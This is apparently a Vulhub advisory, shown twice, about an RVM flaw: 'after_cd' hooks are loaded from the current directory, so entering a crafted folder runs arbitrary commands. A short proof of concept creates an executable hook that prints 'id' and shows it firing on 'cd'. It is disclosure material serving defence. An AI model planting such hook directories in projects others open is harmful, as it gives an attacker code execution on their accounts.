VULHUB ™

RVM, by default, hooks `cd` and automatically executes various auxiliary hooks when a user changes into a directory. The mechanics of these additional `after_cd` hooks are detailed at <https://rvm.io/workflow/hooks>. What this page fails to mention is that hooks, as of a vulnerable version, are not only loaded from `~/.rvm/hooks` but are also loaded from `$PWD/.rvm/hooks` as per the code, as of a vulnerable commit, at <https://github.com/rvm/rvm/blob/b04c0158d/scripts/hook#L23-L27>. This behaviour can be used to achieve arbitrary command execution when a user changes into a directory with malicious contents. Note that hook files must be executable for them to be triggered. ### POC ```text rvm@e6aeaf6d79ec:~$ mkdir -p poc/.rvm/hooks rvm@e6aeaf6d79ec:~$ cat > poc/.rvm/hooks/after_cd_poc #!/bin/sh echo "Command execution as $(id)" ^D rvm@e6aeaf6d79ec:~$ chmod a+x poc/.rvm/hooks/after_cd_poc rvm@e6aeaf6d79ec:~$ cd poc Command execution as uid=1000(rvm) gid=1000(rvm) groups=1000(rvm)...

RVM, by default, hooks `cd` and automatically executes various auxiliary hooks when a user changes into a directory. The mechanics of these additional `after_cd` hooks are detailed at <https://rvm.io/workflow/hooks>. What this page fails to mention is that hooks, as of a vulnerable version, are not only loaded from `~/.rvm/hooks` but are also loaded from `$PWD/.rvm/hooks` as per the code, as of a vulnerable commit, at <https://github.com/rvm/rvm/blob/b04c0158d/scripts/hook#L23-L27>. This behaviour can be used to achieve arbitrary command execution when a user changes into a directory with malicious contents. Note that hook files must be executable for them to be triggered. ### POC ```text rvm@e6aeaf6d79ec:~$ mkdir -p poc/.rvm/hooks rvm@e6aeaf6d79ec:~$ cat > poc/.rvm/hooks/after_cd_poc #!/bin/sh echo "Command execution as $(id)" ^D rvm@e6aeaf6d79ec:~$ chmod a+x poc/.rvm/hooks/after_cd_poc rvm@e6aeaf6d79ec:~$ cd poc Command execution as uid=1000(rvm) gid=1000(rvm) groups=1000(rvm) rvm@e6aeaf6d79ec:~/poc$ ```